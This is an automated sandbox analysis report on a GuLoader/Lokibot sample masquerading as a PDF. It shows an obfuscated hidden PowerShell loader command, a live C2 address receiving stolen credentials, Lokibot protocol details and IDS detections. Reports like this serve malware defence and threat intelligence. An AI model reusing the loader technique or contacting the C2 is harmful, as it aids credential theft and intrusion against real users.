Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe

Overview

General Information

Sample name:BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
renamed because original name is a hash value
Original sample name:BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021pdf.exe
Analysis ID:1466694
MD5:811a6608bd141b5c41cceaa9d1e7ee52
SHA1:63ee2d9a226ada53731204f906f5030cb6a28076
SHA256:1de20ab31a930a9f60a323ad35c4a0d670fc457cee78357d099784487bd8c9eb
Tags:exe
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Lokibot
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe (PID: 5396 cmdline: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe" MD5: 811A6608BD141B5C41CCEAA9D1E7EE52)
    • powershell.exe (PID: 3424 cmdline: "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 7572 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000002.00000002.1611756970.0000000009A72000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000E.00000002.2440927525.00000000030F2000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wab.exe PID: 7572JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            Process Memory Space: wab.exe PID: 7572JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3424, TargetFilename: C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)", CommandLine: "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, ParentProcessId: 5396, ParentProcessName: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)", ProcessId: 3424, ProcessName: powershell.exe

              Snort Signatures

              Timestamp:07/03/24-09:42:59.735537
              SID:2025381
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:37.481024
              SID:2025381
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:37.959573
              SID:2024312
              Source Port:49708
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:34.194434
              SID:2024318
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:21.173938
              SID:2021641
              Source Port:49715
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:34.194434
              SID:2021641
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:21.173938
              SID:2024313
              Source Port:49715
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:34.194434
              SID:2024313
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:56.548579
              SID:2024313
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:56.548579
              SID:2021641
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:56.548579
              SID:2024318
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:44.014349
              SID:2024317
              Source Port:49709
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:44.173590
              SID:2024318
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:44.173590
              SID:2021641
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:44.173590
              SID:2024313
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:21.173938
              SID:2024318
              Source Port:49715
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:34.194434
              SID:2025381
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:52.492042
              SID:2024318
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:44.014349
              SID:2024312
              Source Port:49709
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:44.014349
              SID:2021641
              Source Port:49709
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:56.548579
              SID:2025381
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:30.345716
              SID:2024313
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:30.345716
              SID:2021641
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:30.345716
              SID:2024318
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:52.492042
              SID:2024313
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:52.492042
              SID:2021641
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:53.897705
              SID:2024313
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:48.641218
              SID:2021641
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:53.897705
              SID:2021641
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:53.897705
              SID:2024318
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:58.579061
              SID:2025381
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:48.805296
              SID:2024313
              Source Port:49710
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:58.579061
              SID:2024313
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:37.481024
              SID:2024313
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:26.580102
              SID:2024313
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:26.580102
              SID:2021641
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:37.959573
              SID:2025381
              Source Port:49708
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:48.805296
              SID:2024318
              Source Port:49710
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:58.579061
              SID:2021641
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:26.580102
              SID:2024318
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:48.641218
              SID:2024313
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:48.641218
              SID:2024318
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:48.805296
              SID:2021641
              Source Port:49710
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:53.897705
              SID:2025381
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:58.579061
              SID:2024318
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:40.474010
              SID:2025381
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:04.906638
              SID:2025381
              Source Port:49714
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:52.492042
              SID:2025381
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:30.345716
              SID:2025381
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:21.173938
              SID:2025381
              Source Port:49715
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:40.474010
              SID:2024318
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:40.474010
              SID:2024313
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:40.474010
              SID:2021641
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:04.906638
              SID:2024318
              Source Port:49714
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:04.906638
              SID:2021641
              Source Port:49714
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:44.173590
              SID:2025381
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:04.906638
              SID:2024313
              Source Port:49714
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:37.959573
              SID:2024317
              Source Port:49708
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:44.014349
              SID:2025381
              Source Port:49709
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:37.959573
              SID:2021641
              Source Port:49708
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:59.735537
              SID:2024318
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:41:48.805296
              SID:2025381
              Source Port:49710
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:59.735537
              SID:2024313
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:26.580102
              SID:2025381
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:37.481024
              SID:2024318
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:37.481024
              SID:2021641
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:48.641218
              SID:2025381
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/03/24-09:42:59.735537
              SID:2021641
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://45.61.136.239/index.php/54596186971079Avira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeReversingLabs: Detection: 15%
              Multi AV Scanner detection for submitted file
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeReversingLabs: Detection: 16%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: em.Core.pdb" source: powershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tion.pdb source: powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp
              Source: Binary string: wab.pdb source: wab.exe, wab.exe, 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_00406404 FindFirstFileW,FindClose,0_2_00406404
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004058B2

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49708 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49708 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49708 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49708 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49709 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49709 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49709 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49709 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49710 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49710 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49710 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49710 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49711 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49711 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49711 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49711 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49713 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49713 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49713 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49713 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49714 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49714 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49714 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49714 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49715 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49715 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49715 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49715 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49716 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49716 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49717 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49717 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 45.61.136.239:80
